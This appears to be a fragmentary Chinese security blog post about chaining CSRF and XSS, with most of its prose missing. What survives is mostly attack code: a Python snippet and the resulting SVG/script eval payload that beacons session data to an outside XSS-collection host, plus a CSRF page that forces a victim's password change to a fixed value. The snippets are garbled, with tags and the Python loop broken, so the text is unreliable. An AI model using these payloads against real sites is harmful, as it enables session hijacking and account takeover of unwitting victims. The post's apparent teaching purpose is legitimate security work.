Csrf+Xss组合拳
Csrf+Xss组合拳
本文首发于“合天智汇”公众号,作者: 影子 各位大师傅,第一次在合天发文章,请多多关照
-
0x01
- 0x02


-
0x03




in_str = "(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession" output = "" for c in in_str: output += "svg>script>eval("" + output + "")/script>")payload为 在进行测试

svg>script>eval("(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api})();if(''==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession")/script>






- 0x04


``` script type="text/javascript" src="http://admin.3cjz.cn/include/jQ.js">/script> script> function loginSubmit() { $.ajax({ url: "https://www.xxxxxxxx.com/UserApi/updatePassword", type: "post", data: {"newpassword": "123456789"}, dataType: "json", success: function (data) { if (data.status == "1") { } else { } }, }); } loginSubmit() /script> ```那么要去受害者要有兴趣去访问这个payload















- 0x05




